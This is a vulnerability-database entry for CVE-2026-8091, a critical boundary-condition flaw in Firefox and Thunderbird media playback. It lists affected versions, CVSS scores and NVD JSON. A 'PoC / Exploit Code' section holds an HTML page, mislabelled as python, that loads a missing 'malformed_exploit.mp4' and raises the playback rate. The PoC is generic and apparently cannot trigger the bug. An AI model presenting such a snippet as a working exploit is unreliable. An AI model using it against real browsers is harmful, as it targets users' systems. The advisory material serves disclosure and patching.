Security Vulnerability Report
中文
CVE-2026-8091 CVSS 9.8 CRITICAL

CVE-2026-8091

Published: 2026-05-07 13:16:14
Last Modified: 2026-05-11 15:20:21

Description

Incorrect boundary conditions in the Audio/Video: Playback component. This vulnerability was fixed in Firefox 150, Thunderbird 150, Firefox ESR 140.10.1, Thunderbird 140.10.1, and Firefox ESR 115.35.2.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:* - VULNERABLE
Mozilla Firefox < 150
Mozilla Thunderbird < 150
Mozilla Firefox ESR < 140.10.1
Mozilla Thunderbird ESR < 140.10.1
Mozilla Firefox ESR < 115.35.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- Proof of Concept (PoC) for CVE-2026-8091 This HTML snippet attempts to trigger the boundary condition vulnerability in the Audio/Video Playback component of vulnerable Firefox versions. --> <!DOCTYPE html> <html> <head> <title>CVE-2026-8091 PoC</title> </head> <body> <h1>Testing Playback Boundary Condition</h1> <!-- Malformed video source designed to hit the incorrect boundary check --> <video controls> <source src="malformed_exploit.mp4" type="video/mp4"> Your browser does not support the video tag. </video> <script> // Attempt to trigger the vulnerability through playback API manipulation const video = document.querySelector('video'); video.addEventListener('canplay', () => { console.log("Video loaded, attempting to trigger overflow..."); try { // Manipulate playback rate or buffer to potentially hit the boundary condition video.playbackRate = 16.0; video.play(); } catch (e) { console.log("Exception caught: " + e); } }); // Error handling to observe crashes video.addEventListener('error', (e) => { console.log("Video error event fired."); }); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-8091", "sourceIdentifier": "[email protected]", "published": "2026-05-07T13:16:14.087", "lastModified": "2026-05-11T15:20:21.330", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect boundary conditions in the Audio/Video: Playback component. This vulnerability was fixed in Firefox 150, Thunderbird 150, Firefox ESR 140.10.1, Thunderbird 140.10.1, and Firefox ESR 115.35.2."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-754"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionEndExcluding": "115.35.2", "matchCriteriaId": "AF96A878-0508-42AF-A345-ACBC2FE28DD2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionStartIncluding": "140.0", "versionEndExcluding": "140.10.1", "matchCriteriaId": "7CBA9163-28E7-42A3-BB54-EBEF7BBB3485"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:*", "versionStartIncluding": "140.0", "versionEndExcluding": "140.10.1", "matchCriteriaId": "BD593FD4-736A-4AA7-848A-B6FD3E89FDCE"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=2029301", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-30/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-33/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-36/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-39/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-42/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}